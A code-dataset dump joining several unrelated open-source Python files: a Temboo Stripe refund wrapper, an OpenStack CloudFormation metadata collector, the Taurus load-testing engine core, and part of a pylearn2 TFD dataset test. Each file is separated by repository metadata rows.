# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class RefundCharge(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the RefundCharge Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(RefundCharge, self).__init__(temboo_session, '/Library/Stripe/Charges/RefundCharge')
def new_input_set(self):
return RefundChargeInputSet()
def _make_result_set(self, result, path):
return RefundChargeResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return RefundChargeChoreographyExecution(session, exec_id, path)
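# Typical usage (illustrative sketch; the key and charge id are placeholders):
#   choreo = RefundCharge(temboo_session)
#   inputs = choreo.new_input_set()
#   inputs.set_APIKey("YOUR_STRIPE_API_KEY")
#   inputs.set_ChargeID("ch_123")
#   results = choreo.execute_with_results(inputs)
#   print(results.get_Response())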
class RefundChargeInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the RefundCharge
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_APIKey(self, value):
"""
Set the value of the APIKey input for this Choreo. ((required, string) The API Key provided by Stripe)
"""
super(RefundChargeInputSet, self)._set_input('APIKey', value)
def set_Amount(self, value):
"""
Set the value of the Amount input for this Choreo. ((optional, integer) The amount to refund to the customer in cents. When left empty, the entire charge is refunded.)
"""
super(RefundChargeInputSet, self)._set_input('Amount', value)
def set_ChargeID(self, value):
"""
Set the value of the ChargeID input for this Choreo. ((required, string) The unique identifier of the charge to be refunded)
"""
super(RefundChargeInputSet, self)._set_input('ChargeID', value)
class RefundChargeResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the RefundCharge Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Stripe)
"""
return self._output.get('Response', None)
class RefundChargeChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return RefundChargeResultSet(response, path)
| gpl-2.0 | -9,004,033,191,687,605,000 | 36.565217 | 175 | 0.672164 | false |
citrix-openstack-build/os-collect-config | os_collect_config/cfn.py | 1 | 6705 | # Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
from keystoneclient.contrib.ec2 import utils as ec2_utils
from lxml import etree
from oslo.config import cfg
import six.moves.urllib.parse as urlparse
from os_collect_config import common
from os_collect_config import exc
from os_collect_config.openstack.common import log
CONF = cfg.CONF
logger = log.getLogger(__name__)
opts = [
cfg.StrOpt('metadata-url',
help='URL to query for CloudFormation Metadata'),
cfg.StrOpt('heat-metadata-hint',
default='/var/lib/heat-cfntools/cfn-metadata-server',
help='Local file to read for metadata url if not explicitly '
' specified'),
cfg.StrOpt('stack-name',
help='Stack name to describe'),
cfg.MultiStrOpt('path',
help='Path to Metadata'),
cfg.StrOpt('secret-access-key',
help='Secret Access Key'),
cfg.StrOpt('access-key-id',
help='Access Key ID'),
cfg.MultiStrOpt('deployment-key',
default=['deployments'],
help='Key(s) to explode into multiple collected outputs. '
'Parsed according to the expected Metadata created by '
'OS::Heat::StructuredDeployment. Only Exploded if seen at '
'the root of the Metadata.')
]
name = 'cfn'
class Collector(object):
def __init__(self, requests_impl=common.requests):
self._requests_impl = requests_impl
self._session = requests_impl.Session()
def collect(self):
if CONF.cfn.metadata_url is None:
if (CONF.cfn.heat_metadata_hint
and os.path.exists(CONF.cfn.heat_metadata_hint)):
with open(CONF.cfn.heat_metadata_hint) as hint:
CONF.cfn.metadata_url = '%s/v1/' % hint.read().strip()
else:
logger.warn('No metadata_url configured.')
raise exc.CfnMetadataNotConfigured
if CONF.cfn.access_key_id is None:
logger.warn('No Access Key ID configured.')
raise exc.CfnMetadataNotConfigured
if CONF.cfn.secret_access_key is None:
logger.warn('No Secret Access Key configured.')
raise exc.CfnMetadataNotConfigured
url = CONF.cfn.metadata_url
stack_name = CONF.cfn.stack_name
headers = {'Content-Type': 'application/json'}
final_content = {}
if CONF.cfn.path is None:
logger.warn('No path configured')
raise exc.CfnMetadataNotConfigured
signer = ec2_utils.Ec2Signer(secret_key=CONF.cfn.secret_access_key)
for path in CONF.cfn.path:
if '.' not in path:
logger.error('Path not in format resource.field[.x.y] (%s)' %
path)
raise exc.CfnMetadataNotConfigured
resource, field = path.split('.', 1)
if '.' in field:
field, sub_path = field.split('.', 1)
else:
sub_path = ''
params = {'Action': 'DescribeStackResource',
'StackName': stack_name,
'LogicalResourceId': resource,
'AWSAccessKeyId': CONF.cfn.access_key_id,
'SignatureVersion': '2'}
parsed_url = urlparse.urlparse(url)
credentials = {'params': params,
'verb': 'GET',
'host': parsed_url.netloc,
'path': parsed_url.path}
params['Signature'] = signer.generate(credentials)
try:
content = self._session.get(
url, params=params, headers=headers)
content.raise_for_status()
except self._requests_impl.exceptions.RequestException as e:
logger.warn(e)
raise exc.CfnMetadataNotAvailable
map_content = etree.fromstring(content.text)
resource_detail = map_content.find(
'DescribeStackResourceResult').find('StackResourceDetail')
sub_element = resource_detail.find(field)
if sub_element is None:
logger.warn('Path %s does not exist.' % (path))
raise exc.CfnMetadataNotAvailable
try:
value = json.loads(sub_element.text)
except ValueError as e:
logger.warn(
'Path %s failed to parse as json. (%s)' % (path, e))
raise exc.CfnMetadataNotAvailable
if sub_path:
for subkey in sub_path.split('.'):
try:
value = value[subkey]
except KeyError:
logger.warn(
'Sub-key %s does not exist. (%s)' % (subkey, path))
raise exc.CfnMetadataNotAvailable
final_content.update(value)
final_list = []
for depkey in cfg.CONF.cfn.deployment_key:
if depkey in final_content:
deployments = final_content[depkey]
if not isinstance(deployments, list):
logger.warn(
'Deployment-key %s was found but does not contain a '
'list.' % (depkey,))
continue
logger.debug(
'Deployment found for %s' % (depkey,))
for deployment in deployments:
if 'name' not in deployment:
logger.warn(
'No name found for a deployment under %s.' %
(depkey,))
continue
if deployment.get('group', 'Heat::Ungrouped') in (
'os-apply-config', 'Heat::Ungrouped'):
final_list.append((deployment['name'],
deployment['config']))
final_list.insert(0, ('cfn', final_content))
return final_list
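# --- Illustrative sketch (not part of the original module) ---
# Shows how a configured cfn path such as "server.Metadata.deployments" is split
# by Collector.collect() above: the first dot separates the resource, the second
# separates the field from the optional sub-path that is then walked key by key.
def _example_path_split(path='server.Metadata.deployments'):
    resource, field = path.split('.', 1)
    if '.' in field:
        field, sub_path = field.split('.', 1)
    else:
        sub_path = ''
    return resource, field, sub_path  # ('server', 'Metadata', 'deployments')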
| apache-2.0 | 3,027,588,708,427,825,000 | 41.707006 | 79 | 0.544817 | false |
Blazemeter/taurus | bzt/engine/engine.py | 1 | 29705 | """
Main BZT classes
Copyright 2015 BlazeMeter Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import codecs
import copy
import datetime
import json
import logging
import os
import pkgutil
import shutil
import sys
import threading
import time
import traceback
import uuid
from distutils.version import LooseVersion
from urllib import parse
from bzt import ManualShutdown, get_configs_dir, TaurusConfigError, TaurusInternalException
from bzt.utils import reraise, load_class, BetterDict, ensure_is_dict, dehumanize_time, is_windows, is_linux, temp_file
from bzt.utils import shell_exec, get_full_path, ExceptionalDownloader, get_uniq_name, HTTPClient, Environment
from bzt.utils import NETWORK_PROBLEMS
from .dicts import Configuration
from .modules import Provisioning, Reporter, Service, Aggregator, EngineModule
from .names import EXEC, TAURUS_ARTIFACTS_DIR, SETTINGS
from .templates import Singletone
from ..environment_helpers import expand_variable_with_os, custom_expandvars, expand_envs_with_os
from bzt.resources.version import VERSION, DEV_VERSION
class Engine(object):
"""
Core entity of the technology, used to coordinate whole process
:type reporters: list[Reporter]
    :type services: list[Service]
:type log: logging.Logger
:type aggregator: bzt.modules.aggregator.ConsolidatingAggregator
:type stopping_reason: BaseException
"""
ARTIFACTS_DIR = "%Y-%m-%d_%H-%M-%S.%f"
def __init__(self, parent_logger):
"""
:type parent_logger: logging.Logger
"""
self.file_search_paths = []
self.services = []
self.__artifacts = []
self.reporters = []
self.artifacts_dir = None
self.log = parent_logger.getChild(self.__class__.__name__)
self.env = Environment(self.log) # backward compatibility
self.shared_env = Environment(self.log) # backward compatibility
self.config = Configuration()
self.config.log = self.log.getChild(Configuration.__name__)
self.modules = {} # available modules
self.provisioning = Provisioning()
self.aggregator = Aggregator(is_functional=False)
self.aggregator.engine = self
self.interrupted = False
self.check_interval = 1
self.stopping_reason = None
self.engine_loop_utilization = 0
self.prepared = []
self.started = []
self.default_cwd = None
self.logging_level_down = lambda: None
self.logging_level_up = lambda: None
self.user_pythonpath = None
self.temp_pythonpath = None
self._http_client = None
self.graceful_tmp = None
def set_pythonpath(self):
version = sys.version.split(' ')[0]
path_suffix = os.path.join('python-packages', version)
self.user_pythonpath = get_full_path(os.path.join("~", ".bzt", path_suffix))
self.temp_pythonpath = get_full_path(os.path.join(self.artifacts_dir, path_suffix))
current_pythonpath = os.environ.get('PYTHONPATH', '')
paths = self.user_pythonpath, self.temp_pythonpath, current_pythonpath
self.log.debug("Set PYTHONPATH to :\n\tUSER: '{}' +\n\tTEMP: '{}' +\n\tCURRENT: '{}'".format(*paths))
try:
user_packages = os.listdir(self.user_pythonpath)
except:
user_packages = []
self.log.debug("Content of user packages dir: {}".format(user_packages))
os.environ['PYTHONPATH'] = os.pathsep.join(paths)
def configure(self, user_configs, read_config_files=True):
"""
Load configuration files
:type user_configs: list[str]
:type read_config_files: bool
"""
self.log.info("Configuring...")
if read_config_files:
self._load_base_configs()
merged_config = self._load_user_configs(user_configs)
all_includes = []
while "included-configs" in self.config:
includes = self.config.pop("included-configs")
included_configs = [self.find_file(conf) for conf in includes if conf not in all_includes + user_configs]
all_includes += includes
self.config.load(included_configs)
self.config['included-configs'] = all_includes
self.config.merge({"version": VERSION})
self.get_http_client()
if self.config.get(SETTINGS).get("check-updates", True):
install_id = self.config.get("install-id", self._generate_id())
def wrapper():
return self._check_updates(install_id)
thread = threading.Thread(target=wrapper) # intentionally non-daemon thread
thread.start()
return merged_config
def unify_config(self):
executions = self.config.get(EXEC, [])
if isinstance(executions, dict):
executions = [executions]
self.config[EXEC] = executions
settings = self.config.get(SETTINGS)
default_executor = settings.get("default-executor", None)
prov_type = self.config.get(Provisioning.PROV)
for execution in executions: # type: BetterDict
executor = execution.get("executor", default_executor, force_set=True)
if not executor:
msg = "Cannot determine executor type and no default executor in %s"
raise TaurusConfigError(msg % execution)
reporting = self.config.get(Reporter.REP, [])
for index in range(len(reporting)):
ensure_is_dict(reporting, index, "module")
services = self.config.get(Service.SERV, [])
for index in range(len(services)):
ensure_is_dict(services, index, "module")
modules = self.config.get("modules")
for module in modules:
ensure_is_dict(modules, module, "class")
@staticmethod
def _generate_id():
if os.getenv("JENKINS_HOME"):
prefix = "jenkins"
elif os.getenv("TRAVIS"):
prefix = "travis"
elif any([key.startswith("bamboo") for key in os.environ.keys()]):
prefix = "bamboo"
elif os.getenv("TEAMCITY_VERSION"):
prefix = "teamcity"
elif os.getenv("DOCKER_HOST"):
prefix = "docker"
elif os.getenv("AWS_"):
prefix = "amazon"
elif os.getenv("GOOGLE_APPLICATION_CREDENTIALS") or os.getenv("CLOUDSDK_CONFIG"):
prefix = "google_cloud"
elif os.getenv("WEBJOBS_NAME"):
prefix = "azure"
elif is_linux():
prefix = 'linux'
elif is_windows():
prefix = 'windows'
else:
prefix = 'macos'
return "%s-%x" % (prefix, uuid.getnode())
def prepare(self):
"""
Prepare engine for work, will call preparing of Provisioning and add
downstream EngineModule instances
"""
self.log.info("Preparing...")
self.unify_config()
interval = self.config.get(SETTINGS).get("check-interval", self.check_interval)
self.check_interval = dehumanize_time(interval)
try:
self.__prepare_aggregator()
self.__prepare_services()
self.__prepare_provisioning()
self.__prepare_reporters()
self.config.dump()
except BaseException as exc:
self.stopping_reason = exc
raise
def _startup(self):
modules = self.services + [self.aggregator] + self.reporters + [self.provisioning] # order matters
for module in modules:
self.log.debug("Startup %s", module)
self.started.append(module)
module.startup()
self.config.dump()
def start_subprocess(self, args, env, cwd=None, **kwargs):
if cwd is None:
cwd = self.default_cwd
self.graceful_tmp = self.create_artifact(prefix="GRACEFUL", suffix="")
env = env.get()
env['GRACEFUL'] = self.graceful_tmp
return shell_exec(args, cwd=cwd, env=env, **kwargs)
def run(self):
"""
Run the job. Calls `startup`, does periodic `check`,
calls `shutdown` in any case
"""
self.log.info("Starting...")
exc_info = exc_value = None
try:
self._startup()
self.logging_level_down()
self._wait()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
exc_value = exc
exc_info = sys.exc_info()
finally:
self.log.warning("Please wait for graceful shutdown...")
try:
self.logging_level_up()
self._shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
if exc_value:
reraise(exc_info, exc_value)
def _check_modules_list(self):
stop = False
modules = [self.provisioning, self.aggregator] + self.services + self.reporters # order matters
for module in modules:
if module in self.started:
self.log.debug("Checking %s", module)
finished = bool(module.check())
if finished:
self.log.debug("%s finished", module)
stop = finished
return stop
def _wait(self):
"""
Wait modules for finish
:return:
"""
prev = time.time()
while not self._check_modules_list():
now = time.time()
diff = now - prev
delay = self.check_interval - diff
self.engine_loop_utilization = diff / self.check_interval
self.log.debug("Iteration took %.3f sec, sleeping for %.3f sec...", diff, delay)
if delay > 0:
time.sleep(delay)
prev = time.time()
if self.interrupted:
raise ManualShutdown()
self.config.dump()
def _shutdown(self):
"""
Shutdown modules
:return:
"""
self.log.info("Shutting down...")
self.log.debug("Current stop reason: %s", self.stopping_reason)
if self.graceful_tmp:
open(self.graceful_tmp, 'x').close()
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
for module in modules:
try:
if module in self.started:
module.shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
if self.graceful_tmp and os.path.exists(self.graceful_tmp):
os.remove(self.graceful_tmp)
self.config.dump()
if exc_value:
reraise(exc_info, exc_value)
def post_process(self):
"""
Do post-run analysis and processing for the results.
"""
self.log.info("Post-processing...")
# :type exception: BaseException
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
# services are last because of shellexec which is "final-final" action
for module in modules:
if module in self.prepared:
try:
module.post_process()
except BaseException as exc:
if isinstance(exc, KeyboardInterrupt):
self.log.debug("post_process: %s", exc)
else:
self.log.debug("post_process: %s\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
self.config.dump()
if exc_info:
reraise(exc_info, exc_value)
def create_artifact(self, prefix, suffix):
"""
Create new artifact in artifacts dir with given prefix and suffix
:type prefix: str
:type suffix: str
:return: Path to created file
:rtype: str
:raise TaurusInternalException: if no artifacts dir set
"""
if not self.artifacts_dir:
raise TaurusInternalException("Cannot create artifact: no artifacts_dir set up")
filename = get_uniq_name(self.artifacts_dir, prefix, suffix, self.__artifacts)
self.__artifacts.append(filename)
self.log.debug("New artifact filename: %s", filename)
return filename
def existing_artifact(self, filename, move=False, target_filename=None):
"""
Add existing artifact, it will be collected into artifact_dir. If
move=True, the original file will be deleted
:type filename: str
:type move: bool
:type target_filename: str
"""
self.log.debug("Add existing artifact (move=%s): %s", move, filename)
if self.artifacts_dir is None:
self.log.warning("Artifacts dir has not been set, will not copy %s", filename)
return
new_filename = os.path.basename(filename) if target_filename is None else target_filename
new_name = os.path.join(self.artifacts_dir, new_filename)
self.__artifacts.append(new_name)
if get_full_path(filename) == get_full_path(new_name):
self.log.debug("No need to copy %s", filename)
return
if not os.path.exists(filename):
self.log.warning("Artifact file not exists: %s", filename)
return
if move:
self.log.debug("Moving %s to %s", filename, new_name)
shutil.move(filename, new_name)
else:
self.log.debug("Copying %s to %s", filename, new_name)
shutil.copy(filename, new_name)
def create_artifacts_dir(self, existing_artifacts=(), merged_config=None):
"""
Create directory for artifacts, directory name based on datetime.now()
"""
if not self.artifacts_dir:
artifacts_dir = self.config.get(SETTINGS, force_set=True).get("artifacts-dir", self.ARTIFACTS_DIR)
self.artifacts_dir = datetime.datetime.now().strftime(artifacts_dir)
self.artifacts_dir = self.__expand_artifacts_dir()
self.log.info("Artifacts dir: %s", self.artifacts_dir)
os.environ[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
if not os.path.isdir(self.artifacts_dir):
os.makedirs(self.artifacts_dir)
# dump current effective configuration
        dump = self.create_artifact("effective", "")  # TODO: not good, since this file does not exist yet
self.config.set_dump_file(dump)
self.config.dump()
# dump merged configuration
if merged_config:
merged_config.dump(self.create_artifact("merged", ".yml"), Configuration.YAML)
merged_config.dump(self.create_artifact("merged", ".json"), Configuration.JSON)
for artifact in existing_artifacts:
self.existing_artifact(artifact)
def __expand_artifacts_dir(self):
envs = self.__get_envs_from_config()
artifacts_dir = custom_expandvars(self.artifacts_dir, envs)
artifacts_dir = expand_variable_with_os(artifacts_dir)
artifacts_dir = get_full_path(artifacts_dir)
return artifacts_dir
def is_functional_mode(self):
return self.aggregator is not None and self.aggregator.is_functional
def __load_module(self, alias):
"""
Load module class by alias
:param alias: str
:return: class
"""
if alias in self.modules:
return self.modules[alias]
mod_conf = self.config.get('modules')
if alias not in mod_conf:
msg = "Module '%s' not found in list of available aliases %s" % (alias, sorted(mod_conf.keys()))
raise TaurusConfigError(msg)
settings = ensure_is_dict(mod_conf, alias, "class")
acopy = copy.deepcopy(settings)
BetterDict.traverse(acopy, Configuration.masq_sensitive)
self.log.debug("Module config: %s %s", alias, acopy)
err = TaurusConfigError("Class name for alias '%s' is not found in module settings: %s" % (alias, settings))
clsname = settings.get('class', err)
self.modules[alias] = load_class(clsname)
if not issubclass(self.modules[alias], EngineModule):
raise TaurusInternalException("Module class does not inherit from EngineModule: %s" % clsname)
return self.modules[alias]
def instantiate_module(self, alias):
"""
Create new instance for module using its alias from module settings
section of config. Thus, to instantiate module it should be mentioned
in settings.
:type alias: str
:rtype: EngineModule
"""
classobj = self.__load_module(alias)
instance = classobj()
assert isinstance(instance, EngineModule)
instance.log = self.log.getChild(alias)
instance.engine = self
settings = self.config.get("modules")
instance.settings = settings.get(alias)
return instance
def find_file(self, filename):
"""
        Try to find a file or dir in search_path if it was specified. Helps find files
        in non-CLI environments or relative to the config path.
        The returned path is already absolute, so it must not be passed through abspath/etc. again.
:param filename: file basename to find
:type filename: str
"""
if not filename:
return filename
if filename.lower().startswith("http://") or filename.lower().startswith("https://"):
parsed_url = parse.urlparse(filename)
downloader = ExceptionalDownloader(self.get_http_client())
self.log.info("Downloading %s", filename)
tmp_f_name, headers = downloader.get(filename)
cd_header = headers.get('Content-Disposition', '')
dest = cd_header.split('filename=')[-1] if cd_header and 'filename=' in cd_header else ''
if dest.startswith('"') and dest.endswith('"') or dest.startswith("'") and dest.endswith("'"):
dest = dest[1:-1]
elif not dest:
dest = os.path.basename(parsed_url.path)
fname, ext = os.path.splitext(dest) if dest else (parsed_url.hostname.replace(".", "_"), '.file')
dest = self.create_artifact(fname, ext)
self.log.debug("Moving %s to %s", tmp_f_name, dest)
shutil.move(tmp_f_name, dest)
return dest
else:
filename = os.path.expanduser(filename) # expanding of '~' is required for check of existence
# check filename 'as is' and all combinations of file_search_path/filename
for dirname in [""] + self.file_search_paths:
location = os.path.join(dirname, filename)
if os.path.exists(location):
if dirname:
self.log.warning("Guessed location from search paths for %s: %s", filename, location)
return get_full_path(location)
self.log.warning("Could not find location at path: %s", filename)
return filename
def _load_base_configs(self):
configs = []
try:
sys.path.insert(0, os.path.curdir) # necessary for development mode (running bzt from curdir)
configs.extend(self._scan_system_configs())
configs.extend(self._scan_package_configs())
finally:
sys.path.pop(0)
configs.sort(key=os.path.basename)
self.log.debug("Base configs list: %s", configs)
if not configs:
self.log.warning("No base configs were discovered")
self.config.load(configs)
def _scan_package_configs(self):
configs = []
for importer, modname, ispkg in pkgutil.iter_modules(path=None):
try:
if not ispkg:
continue
package_path = getattr(importer, 'path', None)
if package_path is None:
continue
index_path = os.path.join(package_path, modname, 'bzt-configs.json')
if not os.path.exists(index_path):
continue
try:
with codecs.open(index_path, 'rb', encoding='utf-8') as fds:
index_configs = json.load(fds)
except (OSError, IOError, ValueError) as exc:
self.log.debug("Can't load package-specific bzt config %s: %s", index_path, exc)
continue
if not isinstance(index_configs, list):
self.log.debug("Error: value of bzt-configs.json should be a list (%s)" % index_path)
continue
for config_name in index_configs:
configs.append(os.path.join(importer.path, modname, config_name))
except BaseException as exc:
self.log.warning("Can't look for package configs in package %r: %s", modname, str(exc))
self.log.debug("Traceback: %s", traceback.format_exc())
return configs
def _scan_system_configs(self):
configs = []
machine_dir = get_configs_dir() # can't refactor machine_dir out - see setup.py
if os.path.isdir(machine_dir):
self.log.debug("Reading system configs from: %s", machine_dir)
for cfile in sorted(os.listdir(machine_dir)):
fname = os.path.join(machine_dir, cfile)
if os.path.isfile(fname):
configs.append(fname)
return configs
def _load_user_configs(self, user_configs):
"""
:type user_configs: list[str]
:rtype: Configuration
"""
# "tab-replacement-spaces" is not documented 'cause it loads only from base configs
# so it's sort of half-working last resort
self.config.tab_replacement_spaces = self.config.get(SETTINGS).get("tab-replacement-spaces", 4)
self.log.debug("User configs list: %s", user_configs)
self.config.load(user_configs)
user_config = Configuration()
user_config.log = self.log.getChild(Configuration.__name__)
user_config.tab_replacement_spaces = self.config.tab_replacement_spaces
user_config.warn_on_tab_replacement = False
user_config.load(user_configs, self.__config_loaded)
return user_config
def __config_loaded(self, config):
self.file_search_paths.append(get_full_path(config, step_up=1))
def __prepare_provisioning(self):
"""
Instantiate provisioning class
"""
err = TaurusConfigError("Please check global config availability or configure provisioning settings")
cls = self.config.get(Provisioning.PROV, err)
self.provisioning = self.instantiate_module(cls)
self.prepared.append(self.provisioning)
self.provisioning.prepare()
def __prepare_reporters(self):
"""
Instantiate reporters, then prepare them in case they would like to interact
"""
reporting = self.config.get(Reporter.REP, [])
for index, reporter in enumerate(reporting):
msg = "reporter 'module' field isn't recognized: %s"
cls = reporter.get('module', TaurusConfigError(msg % reporter))
instance = self.instantiate_module(cls)
instance.parameters = reporter
if self.__singletone_exists(instance, self.reporters):
continue
assert isinstance(instance, Reporter)
self.reporters.append(instance)
for reporter in self.reporters[:]:
if not reporter.should_run():
self.reporters.remove(reporter)
# prepare reporters
for module in self.reporters:
self.prepared.append(module)
module.prepare()
def __prepare_services(self):
"""
Instantiate service modules, then prepare them
"""
srv_config = self.config.get(Service.SERV, [])
services = []
for index, config in enumerate(srv_config):
cls = config.get('module', '')
instance = self.instantiate_module(cls)
instance.parameters = config
if self.__singletone_exists(instance, services):
continue
assert isinstance(instance, Service)
services.append(instance)
for service in services[:]:
if not service.should_run():
services.remove(service)
self.services.extend(services)
for module in self.services:
self.prepared.append(module)
module.prepare()
def __singletone_exists(self, instance, mods_list):
"""
:type instance: EngineModule
:type mods_list: list[EngineModule]
:rtype: bool
"""
if not isinstance(instance, Singletone):
return False
for mod in mods_list:
if mod.parameters.get("module") == instance.parameters.get("module"):
msg = "Module '%s' can be only used once, will merge all new instances into single"
self.log.warning(msg % mod.parameters.get("module"))
mod.parameters.merge(instance.parameters)
return True
return False
def __prepare_aggregator(self):
"""
Instantiate aggregators
:return:
"""
cls = self.config.get(SETTINGS).get("aggregator", "")
if not cls:
self.log.warning("Proceeding without aggregator, no results analysis")
else:
self.aggregator = self.instantiate_module(cls)
self.prepared.append(self.aggregator)
self.aggregator.prepare()
def get_http_client(self):
if self._http_client is None:
self._http_client = HTTPClient()
self._http_client.add_proxy_settings(self.config.get("settings").get("proxy"))
return self._http_client
def _check_updates(self, install_id):
if VERSION == DEV_VERSION:
return
params = (VERSION, install_id)
addr = "https://gettaurus.org/updates/?version=%s&installID=%s" % params
self.log.debug("Requesting updates info: %s", addr)
client = self.get_http_client()
try:
response = client.request('GET', addr, timeout=10)
except NETWORK_PROBLEMS:
self.log.debug("Failed to check for updates: %s", traceback.format_exc())
self.log.warning("Failed to check for updates")
return
data = response.json()
latest = data.get('latest')
needs_upgrade = data.get('needsUpgrade')
if latest is None or needs_upgrade is None:
self.log.warning(f'Wrong updates info: "{data}"')
else:
self.log.debug(f'Taurus updates info: "{data}"')
mine = LooseVersion(VERSION)
if (mine < latest) or needs_upgrade:
msg = "There is newer version of Taurus %s available, consider upgrading. " \
"What's new: http://gettaurus.org/docs/Changelog/"
self.log.warning(msg, latest)
else:
self.log.debug("Installation is up-to-date")
def eval_env(self):
"""
Should be done after `configure`
"""
envs = self.__get_envs_from_config()
envs = expand_envs_with_os(envs)
def apply_env(value, key, container):
if isinstance(value, str):
container[key] = custom_expandvars(value, envs)
BetterDict.traverse(self.config, apply_env)
self.__export_variables_to_os()
def __export_variables_to_os(self):
"""
Export all user-defined environment variables to the system.
Example:
settings:
env:
FOO: bbb/ccc
BAR: aaa
"""
envs = self.__get_envs_from_config()
for var_name in envs:
if envs[var_name] is None:
if var_name in os.environ:
os.environ.pop(var_name)
else:
os.environ[var_name] = envs[var_name]
self.log.debug("OS env: %s=%s", var_name, envs[var_name])
def __get_envs_from_config(self):
envs = self.config.get(SETTINGS, force_set=True).get("env", force_set=True)
envs[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
return envs
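# --- Illustrative sketch (not part of the original module) ---
# Mirrors the semantics of Engine.__export_variables_to_os() above on plain dicts:
# a value of None removes the variable from the environment, anything else sets it.
def _example_export_envs(envs, environ):
    for var_name, value in envs.items():
        if value is None:
            environ.pop(var_name, None)
        else:
            environ[var_name] = value
    return environ
# _example_export_envs({'FOO': 'bbb/ccc', 'BAR': None}, {'BAR': 'aaa'}) -> {'FOO': 'bbb/ccc'}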
| apache-2.0 | 210,177,917,894,074,000 | 36.696701 | 119 | 0.588386 | false |
mclaughlin6464/pylearn2 | pylearn2/datasets/tests/test_tfd.py | 45 | 3849 | import unittest
import numpy as np
from pylearn2.datasets.tfd import TFD
from pylearn2.space import Conv2DSpace
from pylearn2.testing.skip import skip_if_no_data
class TestTFD(unittest.TestCase):
def setUp(self):
skip_if_no_data()
def test_load(self):
TFD(which_set='valid')
TFD(which_set='unlabeled')
TFD(which_set='full_train')
TFD(which_set='test', image_size=96)
TFD(which_set='test', fold=1)
TFD(which_set='test', fold=2)
TFD(which_set='test', fold=3)
TFD(which_set='test', fold=4)
def test_topo(self):
"""Tests that a topological batch has 4 dimensions"""
train = TFD(which_set='train')
topo = train.get_batch_topo(1)
assert topo.ndim == 4
def test_topo_c01b(self):
"""
Tests that a topological batch with axes ('c',0,1,'b')
can be dimshuffled back to match the standard ('b',0,1,'c')
format.
"""
test = TFD(which_set='test')
batch_size = 100
c01b_test = TFD(which_set='test', axes=('c', 0, 1, 'b'))
c01b_X = c01b_test.X[0:batch_size, :]
c01b = c01b_test.get_topological_view(c01b_X)
assert c01b.shape == (1, 48, 48, batch_size)
b01c = c01b.transpose(3, 1, 2, 0)
b01c_X = test.X[0:batch_size, :]
assert c01b_X.shape == b01c_X.shape
assert np.all(c01b_X == b01c_X)
b01c_direct = test.get_topological_view(b01c_X)
assert b01c_direct.shape == b01c.shape
assert np.all(b01c_direct == b01c)
def test_iterator(self):
# Tests that batches returned by an iterator with topological
# data_specs are the same as the ones returned by calling
# get_topological_view on the dataset with the corresponding order
test = TFD(which_set='test')
batch_size = 100
b01c_X = test.X[0:batch_size, :]
b01c_topo = test.get_topological_view(b01c_X)
b01c_b01c_it = test.iterator(
mode='sequential',
batch_size=batch_size,
data_specs=(Conv2DSpace(shape=(48, 48),
num_channels=1,
axes=('b', 0, 1, 'c')),
'features'))
b01c_b01c = b01c_b01c_it.next()
assert np.all(b01c_topo == b01c_b01c)
c01b_test = TFD(which_set='test', axes=('c', 0, 1, 'b'))
c01b_X = c01b_test.X[0:batch_size, :]
c01b_topo = c01b_test.get_topological_view(c01b_X)
c01b_c01b_it = c01b_test.iterator(
mode='sequential',
batch_size=batch_size,
data_specs=(Conv2DSpace(shape=(48, 48),
num_channels=1,
axes=('c', 0, 1, 'b')),
'features'))
c01b_c01b = c01b_c01b_it.next()
assert np.all(c01b_topo == c01b_c01b)
# Also check that samples from iterators with the same data_specs
# with Conv2DSpace do not depend on the axes of the dataset
b01c_c01b_it = test.iterator(
mode='sequential',
batch_size=batch_size,
